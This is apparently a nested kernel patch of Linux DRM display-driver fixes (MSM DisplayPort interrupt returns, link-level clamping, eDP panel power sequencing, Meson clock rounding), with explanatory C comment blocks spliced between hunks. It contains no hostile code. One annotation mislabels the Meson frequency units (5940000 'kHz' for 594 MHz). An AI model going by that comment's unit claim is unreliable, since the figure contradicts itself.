++			/* -ENODEV this means that the panel is not on the aux-bus */
++			if (ret == -ENODEV) {
++				ret = mtk_dp_edp_link_panel(&mtk_dp->aux);
++				if (ret)
++					return ret;
++			} else {
++				mtk_dp_update_bits(mtk_dp, MTK_DP_TOP_PWR_STATE,
++						   DP_PWR_STATE_BANDGAP_TPLL,
++						   DP_PWR_STATE_MASK);
++				mtk_dp_power_disable(mtk_dp);
++				return ret;
++			}
++		}
++	}
++
+ 	pm_runtime_enable(dev);
+ 	pm_runtime_get_sync(dev);
+ 
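/*
 * The skeleton of the aux-bus pattern adopted above, with all
 * example_* names hypothetical. devm_of_dp_aux_populate_bus() probes
 * the panel listed under the aux-bus DT node and calls done_probing()
 * once that driver has bound; -ENODEV means no aux-bus child exists,
 * in which case the callback is invoked by hand to finish setup.
 */
#include <drm/display/drm_dp_aux_bus.h>

static int example_done_probing(struct drm_dp_aux *aux)
{
	/* Safe to look up the freshly-probed panel bridge here. */
	return 0;
}

static int example_populate(struct drm_dp_aux *aux)
{
	int ret = devm_of_dp_aux_populate_bus(aux, example_done_probing);

	if (ret == -ENODEV)	/* panel not described via aux-bus */
		return example_done_probing(aux);
	return ret;
}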
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index fb4f0e336b60e..21e584038581d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -33,6 +33,9 @@ static struct mtk_drm_gem_obj *mtk_drm_gem_init(struct drm_device *dev,
+ 
+ 	size = round_up(size, PAGE_SIZE);
+ 
++	if (size == 0)
++		return ERR_PTR(-EINVAL);
++
+ 	mtk_gem_obj = kzalloc(sizeof(*mtk_gem_obj), GFP_KERNEL);
+ 	if (!mtk_gem_obj)
+ 		return ERR_PTR(-ENOMEM);
+diff --git a/drivers/gpu/drm/meson/meson_vclk.c b/drivers/gpu/drm/meson/meson_vclk.c
+index 2a82119eb58ed..2a942dc6a6dc2 100644
+--- a/drivers/gpu/drm/meson/meson_vclk.c
++++ b/drivers/gpu/drm/meson/meson_vclk.c
+@@ -790,13 +790,13 @@ meson_vclk_vic_supported_freq(struct meson_drm *priv, unsigned int phy_freq,
+ 				 FREQ_1000_1001(params[i].pixel_freq));
+ 		DRM_DEBUG_DRIVER("i = %d phy_freq = %d alt = %d\n",
+ 				 i, params[i].phy_freq,
+-				 FREQ_1000_1001(params[i].phy_freq/10)*10);
++				 FREQ_1000_1001(params[i].phy_freq/1000)*1000);
+ 		/* Match strict frequency */
+ 		if (phy_freq == params[i].phy_freq &&
+ 		    vclk_freq == params[i].vclk_freq)
+ 			return MODE_OK;
+ 		/* Match 1000/1001 variant */
+-		if (phy_freq == (FREQ_1000_1001(params[i].phy_freq/10)*10) &&
++		if (phy_freq == (FREQ_1000_1001(params[i].phy_freq/1000)*1000) &&
+ 		    vclk_freq == FREQ_1000_1001(params[i].vclk_freq))
+ 			return MODE_OK;
+ 	}
+@@ -1070,7 +1070,7 @@ void meson_vclk_setup(struct meson_drm *priv, unsigned int target,
+ 
+ 	for (freq = 0 ; params[freq].pixel_freq ; ++freq) {
+ 		if ((phy_freq == params[freq].phy_freq ||
+-		     phy_freq == FREQ_1000_1001(params[freq].phy_freq/10)*10) &&
++		     phy_freq == FREQ_1000_1001(params[freq].phy_freq/1000)*1000) &&
+ 		    (vclk_freq == params[freq].vclk_freq ||
+ 		     vclk_freq == FREQ_1000_1001(params[freq].vclk_freq))) {
+ 			if (vclk_freq != params[freq].vclk_freq)
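/*
 * A worked example of the rounding change, assuming FREQ_1000_1001(f)
 * rounds f * 1000 / 1001 to the nearest integer and phy_freq is in
 * kHz. For the 594 MHz PHY rate (phy_freq = 5940000):
 *
 *   old: FREQ_1000_1001(5940000/10)*10     = 593407*10 = 5934070
 *   new: FREQ_1000_1001(5940000/1000)*1000 = 5934*1000 = 5934000
 *
 * The clock setup computes the fractional target at the same /1000
 * granularity, so the old comparison missed by 70 kHz and the
 * 1000/1001 variants of high rates were wrongly rejected.
 */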
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index 95e73eddc5e91..d6a810b7cfa2c 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -2036,18 +2036,12 @@ struct msm_gpu *a6xx_gpu_init(struct drm_device *dev)
+ 			adreno_cmp_rev(ADRENO_REV(6, 3, 5, ANY_ID), info->rev)))
+ 		adreno_gpu->base.hw_apriv = true;
+ 
+-	/*
+-	 * For now only clamp to idle freq for devices where this is known not
+-	 * to cause power supply issues:
+-	 */
+-	if (info && (info->revn == 618))
+-		gpu->clamp_to_idle = true;
+-
+ 	a6xx_llc_slices_init(pdev, a6xx_gpu);
+ 
+ 	ret = a6xx_set_supported_hw(&pdev->dev, config->rev);
+ 	if (ret) {
+-		a6xx_destroy(&(a6xx_gpu->base.base));
++		a6xx_llc_slices_destroy(a6xx_gpu);
++		kfree(a6xx_gpu);
+ 		return ERR_PTR(ret);
+ 	}
+ 
+@@ -2057,6 +2051,13 @@ struct msm_gpu *a6xx_gpu_init(struct drm_device *dev)
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	/*
++	 * For now only clamp to idle freq for devices where this is known not
++	 * to cause power supply issues:
++	 */
++	if (adreno_is_a618(adreno_gpu) || adreno_is_7c3(adreno_gpu))
++		gpu->clamp_to_idle = true;
++
+ 	/* Check if there is a GMU phandle and set it up */
+ 	node = of_parse_phandle(pdev->dev.of_node, "qcom,gmu", 0);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c
+index ae28b2b93e697..ce58d97818bcd 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c
+@@ -439,9 +439,6 @@ static void dpu_encoder_phys_cmd_enable_helper(
+ 
+ 	_dpu_encoder_phys_cmd_pingpong_config(phys_enc);
+ 
+-	if (!dpu_encoder_phys_cmd_is_master(phys_enc))
+-		return;
+-
+ 	ctl = phys_enc->hw_ctl;
+ 	ctl->ops.update_pending_flush_intf(ctl, phys_enc->intf_idx);
+ }
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.c b/drivers/gpu/drm/msm/dp/dp_aux.c
+index 84f9e3e5f9642..559809a5cbcfb 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.c
++++ b/drivers/gpu/drm/msm/dp/dp_aux.c
+@@ -35,6 +35,7 @@ struct dp_aux_private {
+ 	bool no_send_stop;
+ 	bool initted;
+ 	bool is_edp;
++	bool enable_xfers;
+ 	u32 offset;
+ 	u32 segment;
+ 
+@@ -297,6 +298,17 @@ static ssize_t dp_aux_transfer(struct drm_dp_aux *dp_aux,
+ 		goto exit;
+ 	}
+ 
++	/*
++	 * If we're using DP and an external display isn't connected then the
++	 * transfer won't succeed. Return right away. If we don't do this we
++	 * can end up with long timeouts if someone tries to access the DP AUX
++	 * character device when no DP device is connected.
++	 */
++	if (!aux->is_edp && !aux->enable_xfers) {
++		ret = -ENXIO;
++		goto exit;
++	}
++
+ 	/*
+ 	 * For eDP it's important to give a reasonably long wait here for HPD
+ 	 * to be asserted. This is because the panel driver may have _just_
+@@ -368,14 +380,14 @@ static ssize_t dp_aux_transfer(struct drm_dp_aux *dp_aux,
+ 	return ret;
+ }
+ 
+-void dp_aux_isr(struct drm_dp_aux *dp_aux)
++irqreturn_t dp_aux_isr(struct drm_dp_aux *dp_aux)
+ {
+ 	u32 isr;
+ 	struct dp_aux_private *aux;
+ 
+ 	if (!dp_aux) {
+ 		DRM_ERROR("invalid input\n");
+-		return;
++		return IRQ_NONE;
+ 	}
+ 
+ 	aux = container_of(dp_aux, struct dp_aux_private, dp_aux);
+@@ -384,11 +396,11 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 
+ 	/* no interrupts pending, return immediately */
+ 	if (!isr)
+-		return;
++		return IRQ_NONE;
+ 
+ 	if (!aux->cmd_busy) {
+ 		DRM_ERROR("Unexpected DP AUX IRQ %#010x when not busy\n", isr);
+-		return;
++		return IRQ_NONE;
+ 	}
+ 
+ 	/*
+@@ -420,10 +432,20 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 		aux->aux_error_num = DP_AUX_ERR_NONE;
+ 	} else {
+ 		DRM_WARN("Unexpected interrupt: %#010x\n", isr);
+-		return;
++		return IRQ_NONE;
+ 	}
+ 
+ 	complete(&aux->comp);
++
++	return IRQ_HANDLED;
++}
++
++void dp_aux_enable_xfers(struct drm_dp_aux *dp_aux, bool enabled)
++{
++	struct dp_aux_private *aux;
++
++	aux = container_of(dp_aux, struct dp_aux_private, dp_aux);
++	aux->enable_xfers = enabled;
+ }
+ 
+ void dp_aux_reconfig(struct drm_dp_aux *dp_aux)
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.h b/drivers/gpu/drm/msm/dp/dp_aux.h
+index e930974bcb5b9..f3052cb43306b 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.h
++++ b/drivers/gpu/drm/msm/dp/dp_aux.h
+@@ -11,7 +11,8 @@
+ 
+ int dp_aux_register(struct drm_dp_aux *dp_aux);
+ void dp_aux_unregister(struct drm_dp_aux *dp_aux);
+-void dp_aux_isr(struct drm_dp_aux *dp_aux);
++irqreturn_t dp_aux_isr(struct drm_dp_aux *dp_aux);
++void dp_aux_enable_xfers(struct drm_dp_aux *dp_aux, bool enabled);
+ void dp_aux_init(struct drm_dp_aux *dp_aux);
+ void dp_aux_deinit(struct drm_dp_aux *dp_aux);
+ void dp_aux_reconfig(struct drm_dp_aux *dp_aux);
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.c b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+index b20701893e5b3..bd1343602f553 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.c
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.c
+@@ -1014,14 +1014,14 @@ static int dp_ctrl_update_vx_px(struct dp_ctrl_private *ctrl)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (voltage_swing_level >= DP_TRAIN_VOLTAGE_SWING_MAX) {
++	if (voltage_swing_level >= DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(ctrl->drm_dev,
+ 				"max. voltage swing level reached %d\n",
+ 				voltage_swing_level);
+ 		max_level_reached |= DP_TRAIN_MAX_SWING_REACHED;
+ 	}
+ 
+-	if (pre_emphasis_level >= DP_TRAIN_PRE_EMPHASIS_MAX) {
++	if (pre_emphasis_level >= DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(ctrl->drm_dev,
+ 				"max. pre-emphasis level reached %d\n",
+ 				pre_emphasis_level);
+@@ -1112,7 +1112,7 @@ static int dp_ctrl_link_train_1(struct dp_ctrl_private *ctrl,
+ 		}
+ 
+ 		if (ctrl->link->phy_params.v_level >=
+-			DP_TRAIN_VOLTAGE_SWING_MAX) {
++			DP_TRAIN_LEVEL_MAX) {
+ 			DRM_ERROR_RATELIMITED("max v_level reached\n");
+ 			return -EAGAIN;
+ 		}
+@@ -1973,27 +1973,33 @@ int dp_ctrl_off(struct dp_ctrl *dp_ctrl)
+ 	return ret;
+ }
+ 
+-void dp_ctrl_isr(struct dp_ctrl *dp_ctrl)
++irqreturn_t dp_ctrl_isr(struct dp_ctrl *dp_ctrl)
+ {
+ 	struct dp_ctrl_private *ctrl;
+ 	u32 isr;
++	irqreturn_t ret = IRQ_NONE;
+ 
+ 	if (!dp_ctrl)
+-		return;
++		return IRQ_NONE;
+ 
+ 	ctrl = container_of(dp_ctrl, struct dp_ctrl_private, dp_ctrl);
+ 
+ 	isr = dp_catalog_ctrl_get_interrupt(ctrl->catalog);
+ 
++
+ 	if (isr & DP_CTRL_INTR_READY_FOR_VIDEO) {
+ 		drm_dbg_dp(ctrl->drm_dev, "dp_video_ready\n");
+ 		complete(&ctrl->video_comp);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	if (isr & DP_CTRL_INTR_IDLE_PATTERN_SENT) {
+ 		drm_dbg_dp(ctrl->drm_dev, "idle_patterns_sent\n");
+ 		complete(&ctrl->idle_comp);
++		ret = IRQ_HANDLED;
+ 	}
++
++	return ret;
+ }
+ 
+ struct dp_ctrl *dp_ctrl_get(struct device *dev, struct dp_link *link,
+diff --git a/drivers/gpu/drm/msm/dp/dp_ctrl.h b/drivers/gpu/drm/msm/dp/dp_ctrl.h
+index 9f29734af81ca..c3af06dc87b17 100644
+--- a/drivers/gpu/drm/msm/dp/dp_ctrl.h
++++ b/drivers/gpu/drm/msm/dp/dp_ctrl.h
+@@ -25,7 +25,7 @@ int dp_ctrl_off_link_stream(struct dp_ctrl *dp_ctrl);
+ int dp_ctrl_off_link(struct dp_ctrl *dp_ctrl);
+ int dp_ctrl_off(struct dp_ctrl *dp_ctrl);
+ void dp_ctrl_push_idle(struct dp_ctrl *dp_ctrl);
+-void dp_ctrl_isr(struct dp_ctrl *dp_ctrl);
++irqreturn_t dp_ctrl_isr(struct dp_ctrl *dp_ctrl);
+ void dp_ctrl_handle_sink_request(struct dp_ctrl *dp_ctrl);
+ struct dp_ctrl *dp_ctrl_get(struct device *dev, struct dp_link *link,
+ 			struct dp_panel *panel,	struct drm_dp_aux *aux,
+diff --git a/drivers/gpu/drm/msm/dp/dp_display.c b/drivers/gpu/drm/msm/dp/dp_display.c
+index d16c12351adb6..fd82752e502f1 100644
+--- a/drivers/gpu/drm/msm/dp/dp_display.c
++++ b/drivers/gpu/drm/msm/dp/dp_display.c
+@@ -577,6 +577,8 @@ static int dp_hpd_plug_handle(struct dp_display_private *dp, u32 data)
+ 	if (!hpd)
+ 		return 0;
+ 
++	dp_aux_enable_xfers(dp->aux, true);
++
+ 	mutex_lock(&dp->event_mutex);
+ 
+ 	state =  dp->hpd_state;
+@@ -641,6 +643,8 @@ static int dp_hpd_unplug_handle(struct dp_display_private *dp, u32 data)
+ 	if (!hpd)
+ 		return 0;
+ 
++	dp_aux_enable_xfers(dp->aux, false);
++
+ 	mutex_lock(&dp->event_mutex);
+ 
+ 	state = dp->hpd_state;
+@@ -1193,7 +1197,7 @@ static int dp_hpd_event_thread_start(struct dp_display_private *dp_priv)
+ static irqreturn_t dp_display_irq_handler(int irq, void *dev_id)
+ {
+ 	struct dp_display_private *dp = dev_id;
+-	irqreturn_t ret = IRQ_HANDLED;
++	irqreturn_t ret = IRQ_NONE;
+ 	u32 hpd_isr_status;
+ 
+ 	if (!dp) {
+@@ -1221,13 +1225,15 @@ static irqreturn_t dp_display_irq_handler(int irq, void *dev_id)
+ 
+ 		if (hpd_isr_status & DP_DP_HPD_UNPLUG_INT_MASK)
+ 			dp_add_event(dp, EV_HPD_UNPLUG_INT, 0, 0);
++
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	/* DP controller isr */
+-	dp_ctrl_isr(dp->ctrl);
++	ret |= dp_ctrl_isr(dp->ctrl);
+ 
+ 	/* DP aux isr */
+-	dp_aux_isr(dp->aux);
++	ret |= dp_aux_isr(dp->aux);
+ 
+ 	return ret;
+ }
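/*
 * The resulting handler shape, reduced to a pattern (all example_*
 * names are hypothetical). OR-ing irqreturn_t values works because
 * IRQ_NONE is 0 and IRQ_HANDLED is bit 0; returning IRQ_NONE when
 * nothing fired lets the IRQ core's spurious-interrupt detection work.
 */
#include <linux/interrupt.h>

static irqreturn_t example_hpd_isr(void *dev_id);
static irqreturn_t example_ctrl_isr(void *dev_id);
static irqreturn_t example_aux_isr(void *dev_id);

static irqreturn_t example_combined_isr(int irq, void *dev_id)
{
	irqreturn_t ret = IRQ_NONE;

	ret |= example_hpd_isr(dev_id);		/* each sub-ISR reports  */
	ret |= example_ctrl_isr(dev_id);	/* IRQ_NONE/IRQ_HANDLED  */
	ret |= example_aux_isr(dev_id);

	return ret;
}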
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.c b/drivers/gpu/drm/msm/dp/dp_link.c
+index ceb382fa56d5b..e4f9decec970f 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.c
++++ b/drivers/gpu/drm/msm/dp/dp_link.c
+@@ -1102,6 +1102,7 @@ int dp_link_get_colorimetry_config(struct dp_link *dp_link)
+ int dp_link_adjust_levels(struct dp_link *dp_link, u8 *link_status)
+ {
+ 	int i;
++	u8 max_p_level;
+ 	int v_max = 0, p_max = 0;
+ 	struct dp_link_private *link;
+ 
+@@ -1133,30 +1134,29 @@ int dp_link_adjust_levels(struct dp_link *dp_link, u8 *link_status)
+ 	 * Adjust the voltage swing and pre-emphasis level combination to within
+ 	 * the allowable range.
+ 	 */
+-	if (dp_link->phy_params.v_level > DP_TRAIN_VOLTAGE_SWING_MAX) {
++	if (dp_link->phy_params.v_level > DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(link->drm_dev,
+ 			"Requested vSwingLevel=%d, change to %d\n",
+ 			dp_link->phy_params.v_level,
+-			DP_TRAIN_VOLTAGE_SWING_MAX);
+-		dp_link->phy_params.v_level = DP_TRAIN_VOLTAGE_SWING_MAX;
++			DP_TRAIN_LEVEL_MAX);
++		dp_link->phy_params.v_level = DP_TRAIN_LEVEL_MAX;
+ 	}
+ 
+-	if (dp_link->phy_params.p_level > DP_TRAIN_PRE_EMPHASIS_MAX) {
++	if (dp_link->phy_params.p_level > DP_TRAIN_LEVEL_MAX) {
+ 		drm_dbg_dp(link->drm_dev,
+ 			"Requested preEmphasisLevel=%d, change to %d\n",
+ 			dp_link->phy_params.p_level,
+-			DP_TRAIN_PRE_EMPHASIS_MAX);
+-		dp_link->phy_params.p_level = DP_TRAIN_PRE_EMPHASIS_MAX;
++			DP_TRAIN_LEVEL_MAX);
++		dp_link->phy_params.p_level = DP_TRAIN_LEVEL_MAX;
+ 	}
+ 
+-	if ((dp_link->phy_params.p_level > DP_TRAIN_PRE_EMPHASIS_LVL_1)
+-		&& (dp_link->phy_params.v_level ==
+-			DP_TRAIN_VOLTAGE_SWING_LVL_2)) {
++	max_p_level = DP_TRAIN_LEVEL_MAX - dp_link->phy_params.v_level;
++	if (dp_link->phy_params.p_level > max_p_level) {
+ 		drm_dbg_dp(link->drm_dev,
+ 			"Requested preEmphasisLevel=%d, change to %d\n",
+ 			dp_link->phy_params.p_level,
+-			DP_TRAIN_PRE_EMPHASIS_LVL_1);
+-		dp_link->phy_params.p_level = DP_TRAIN_PRE_EMPHASIS_LVL_1;
++			max_p_level);
++		dp_link->phy_params.p_level = max_p_level;
+ 	}
+ 
+ 	drm_dbg_dp(link->drm_dev, "adjusted: v_level=%d, p_level=%d\n",
+diff --git a/drivers/gpu/drm/msm/dp/dp_link.h b/drivers/gpu/drm/msm/dp/dp_link.h
+index 9dd4dd9265304..79c3a02b8dacd 100644
+--- a/drivers/gpu/drm/msm/dp/dp_link.h
++++ b/drivers/gpu/drm/msm/dp/dp_link.h
+@@ -19,19 +19,7 @@ struct dp_link_info {
+ 	unsigned long capabilities;
+ };
+ 
+-enum dp_link_voltage_level {
+-	DP_TRAIN_VOLTAGE_SWING_LVL_0	= 0,
+-	DP_TRAIN_VOLTAGE_SWING_LVL_1	= 1,
+-	DP_TRAIN_VOLTAGE_SWING_LVL_2	= 2,
+-	DP_TRAIN_VOLTAGE_SWING_MAX	= DP_TRAIN_VOLTAGE_SWING_LVL_2,
+-};
+-
+-enum dp_link_preemaphasis_level {
+-	DP_TRAIN_PRE_EMPHASIS_LVL_0	= 0,
+-	DP_TRAIN_PRE_EMPHASIS_LVL_1	= 1,
+-	DP_TRAIN_PRE_EMPHASIS_LVL_2	= 2,
+-	DP_TRAIN_PRE_EMPHASIS_MAX	= DP_TRAIN_PRE_EMPHASIS_LVL_2,
+-};
++#define DP_TRAIN_LEVEL_MAX	3
+ 
+ struct dp_link_test_video {
+ 	u32 test_video_pattern;
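/*
 * What the max_p_level clamp above encodes: DisplayPort limits the
 * *sum* of the voltage-swing and pre-emphasis levels. With
 * DP_TRAIN_LEVEL_MAX = 3 the valid pairs are:
 *
 *   v_level 0 -> p_level 0..3
 *   v_level 1 -> p_level 0..2
 *   v_level 2 -> p_level 0..1
 *   v_level 3 -> p_level 0
 *
 * The removed enums capped both parameters at 2 independently, so
 * legitimate level-3 requests were clamped and training could fail.
 */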
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index a7c6e8a1754de..cd9ca36901611 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -402,8 +402,8 @@ int dsi_link_clk_set_rate_6g(struct msm_dsi_host *msm_host)
+ 	unsigned long byte_intf_rate;
+ 	int ret;
+ 
+-	DBG("Set clk rates: pclk=%d, byteclk=%lu",
+-		msm_host->mode->clock, msm_host->byte_clk_rate);
++	DBG("Set clk rates: pclk=%lu, byteclk=%lu",
++	    msm_host->pixel_clk_rate, msm_host->byte_clk_rate);
+ 
+ 	ret = dev_pm_opp_set_rate(&msm_host->pdev->dev,
+ 				  msm_host->byte_clk_rate);
+@@ -482,9 +482,9 @@ int dsi_link_clk_set_rate_v2(struct msm_dsi_host *msm_host)
+ {
+ 	int ret;
+ 
+-	DBG("Set clk rates: pclk=%d, byteclk=%lu, esc_clk=%lu, dsi_src_clk=%lu",
+-		msm_host->mode->clock, msm_host->byte_clk_rate,
+-		msm_host->esc_clk_rate, msm_host->src_clk_rate);
++	DBG("Set clk rates: pclk=%lu, byteclk=%lu, esc_clk=%lu, dsi_src_clk=%lu",
++	    msm_host->pixel_clk_rate, msm_host->byte_clk_rate,
++	    msm_host->esc_clk_rate, msm_host->src_clk_rate);
+ 
+ 	ret = clk_set_rate(msm_host->byte_clk, msm_host->byte_clk_rate);
+ 	if (ret) {
+diff --git a/drivers/gpu/drm/mxsfb/lcdif_drv.c b/drivers/gpu/drm/mxsfb/lcdif_drv.c
+index 075002ed6fb09..43d316447f387 100644
+--- a/drivers/gpu/drm/mxsfb/lcdif_drv.c
++++ b/drivers/gpu/drm/mxsfb/lcdif_drv.c
+@@ -290,6 +290,9 @@ static int __maybe_unused lcdif_suspend(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
++	if (pm_runtime_suspended(dev))
++		return 0;
++
+ 	return lcdif_rpm_suspend(dev);
+ }
+ 
+@@ -297,7 +300,8 @@ static int __maybe_unused lcdif_resume(struct device *dev)
+ {
+ 	struct drm_device *drm = dev_get_drvdata(dev);
+ 
+-	lcdif_rpm_resume(dev);
++	if (!pm_runtime_suspended(dev))
++		lcdif_rpm_resume(dev);
+ 
+ 	return drm_mode_config_helper_resume(drm);
+ }
+diff --git a/drivers/gpu/drm/panel/panel-edp.c b/drivers/gpu/drm/panel/panel-edp.c
+index bfcddd4aa9322..2c14779a39e88 100644
+--- a/drivers/gpu/drm/panel/panel-edp.c
++++ b/drivers/gpu/drm/panel/panel-edp.c
+@@ -397,6 +397,7 @@ static int panel_edp_suspend(struct device *dev)
+ {
+ 	struct panel_edp *p = dev_get_drvdata(dev);
+ 
++	drm_dp_dpcd_set_powered(p->aux, false);
+ 	gpiod_set_value_cansleep(p->enable_gpio, 0);
+ 	regulator_disable(p->supply);
+ 	p->unprepared_time = ktime_get();
+@@ -453,6 +454,7 @@ static int panel_edp_prepare_once(struct panel_edp *p)
+ 	}
+ 
+ 	gpiod_set_value_cansleep(p->enable_gpio, 1);
++	drm_dp_dpcd_set_powered(p->aux, true);
+ 
+ 	delay = p->desc->delay.hpd_reliable;
+ 	if (p->no_hpd)
+@@ -489,6 +491,7 @@ static int panel_edp_prepare_once(struct panel_edp *p)
+ 	return 0;
+ 
+ error:
++	drm_dp_dpcd_set_powered(p->aux, false);
+ 	gpiod_set_value_cansleep(p->enable_gpio, 0);
+ 	regulator_disable(p->supply);
+ 	p->unprepared_time = ktime_get();
+diff --git a/drivers/gpu/drm/panel/panel-novatek-nt35950.c b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+index 5d04957b1144f..ec2780be74d10 100644
+--- a/drivers/gpu/drm/panel/panel-novatek-nt35950.c
++++ b/drivers/gpu/drm/panel/panel-novatek-nt35950.c
+@@ -573,10 +573,8 @@ static int nt35950_probe(struct mipi_dsi_device *dsi)
+ 		}
+ 		dsi_r_host = of_find_mipi_dsi_host_by_node(dsi_r);
+ 		of_node_put(dsi_r);
+-		if (!dsi_r_host) {
+-			dev_err(dev, "Cannot get secondary DSI host\n");
+-			return -EPROBE_DEFER;
+-		}
++		if (!dsi_r_host)
++			return dev_err_probe(dev, -EPROBE_DEFER, "Cannot get secondary DSI host\n");
+ 
+ 		nt->dsi[1] = mipi_dsi_device_register_full(dsi_r_host, info);
+ 		if (!nt->dsi[1]) {
+diff --git a/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c b/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c
+index 5a8b978c64158..5b698514957cf 100644
+--- a/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c
++++ b/drivers/gpu/drm/panel/panel-samsung-atna33xc20.c
+@@ -53,7 +53,7 @@ static void atana33xc20_wait(ktime_t start_ktime, unsigned int min_ms)
+ 	ktime_t now_ktime, min_ktime;
+ 
+ 	min_ktime = ktime_add(start_ktime, ms_to_ktime(min_ms));
+-	now_ktime = ktime_get();
++	now_ktime = ktime_get_boottime();
+ 
+ 	if (ktime_before(now_ktime, min_ktime))
+ 		msleep(ktime_to_ms(ktime_sub(min_ktime, now_ktime)) + 1);
+@@ -72,10 +72,11 @@ static int atana33xc20_suspend(struct device *dev)
+ 	if (p->el3_was_on)
+ 		atana33xc20_wait(p->el_on3_off_time, 150);
+ 
++	drm_dp_dpcd_set_powered(p->aux, false);
+ 	ret = regulator_disable(p->supply);
+ 	if (ret)
+ 		return ret;
+-	p->powered_off_time = ktime_get();
++	p->powered_off_time = ktime_get_boottime();
+ 	p->el3_was_on = false;
+ 
+ 	return 0;
+@@ -93,7 +94,8 @@ static int atana33xc20_resume(struct device *dev)
+ 	ret = regulator_enable(p->supply);
+ 	if (ret)
+ 		return ret;
+-	p->powered_on_time = ktime_get();
++	drm_dp_dpcd_set_powered(p->aux, true);
++	p->powered_on_time = ktime_get_boottime();
+ 
+ 	if (p->no_hpd) {
+ 		msleep(HPD_MAX_MS);
+@@ -107,19 +109,17 @@ static int atana33xc20_resume(struct device *dev)
+ 		if (hpd_asserted < 0)
+ 			ret = hpd_asserted;
+ 
+-		if (ret)
++		if (ret) {
+ 			dev_warn(dev, "Error waiting for HPD GPIO: %d\n", ret);
+-
+-		return ret;
+-	}
+-
+-	if (p->aux->wait_hpd_asserted) {
++			goto error;
++		}
++	} else if (p->aux->wait_hpd_asserted) {
+ 		ret = p->aux->wait_hpd_asserted(p->aux, HPD_MAX_US);
+ 
+-		if (ret)
++		if (ret) {
+ 			dev_warn(dev, "Controller error waiting for HPD: %d\n", ret);
+-
+-		return ret;
++			goto error;
++		}
+ 	}
+ 
+ 	/*
+@@ -131,6 +131,12 @@ static int atana33xc20_resume(struct device *dev)
+ 	 * right times.
+ 	 */
+ 	return 0;
++
++error:
++	drm_dp_dpcd_set_powered(p->aux, false);
++	regulator_disable(p->supply);
++
++	return ret;
+ }
+ 
+ static int atana33xc20_disable(struct drm_panel *panel)
+@@ -142,7 +148,7 @@ static int atana33xc20_disable(struct drm_panel *panel)
+ 		return 0;
+ 
+ 	gpiod_set_value_cansleep(p->el_on3_gpio, 0);
+-	p->el_on3_off_time = ktime_get();
++	p->el_on3_off_time = ktime_get_boottime();
+ 	p->enabled = false;
+ 
+ 	/*
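/*
 * Why every ktime_get() in this driver became ktime_get_boottime():
 * CLOCK_MONOTONIC stops while the system is suspended, whereas
 * boottime keeps counting. The panel's minimum power-off intervals
 * (e.g. the 150 ms wait after dropping EL_ON3 above) are wall-clock
 * requirements of the hardware, so they must be measured on a clock
 * that advances across suspend/resume.
 */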
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index b714ee1bcbaa3..acb7f5c206d13 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2286,6 +2286,9 @@ static const struct panel_desc innolux_g121x1_l03 = {
+ 		.unprepare = 200,
+ 		.disable = 400,
+ 	},
++	.bus_format = MEDIA_BUS_FMT_RGB666_1X7X3_SPWG,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
++	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+ static const struct drm_display_mode innolux_n156bge_l21_mode = {
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index b233f52675dc4..a72642bb9cc60 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -607,6 +607,8 @@ static void vop2_setup_scale(struct vop2 *vop2, const struct vop2_win *win,
+ 	const struct drm_format_info *info;
+ 	u16 hor_scl_mode, ver_scl_mode;
+ 	u16 hscl_filter_mode, vscl_filter_mode;
++	uint16_t cbcr_src_w = src_w;
++	uint16_t cbcr_src_h = src_h;
+ 	u8 gt2 = 0;
+ 	u8 gt4 = 0;
+ 	u32 val;
+@@ -664,27 +666,27 @@ static void vop2_setup_scale(struct vop2 *vop2, const struct vop2_win *win,
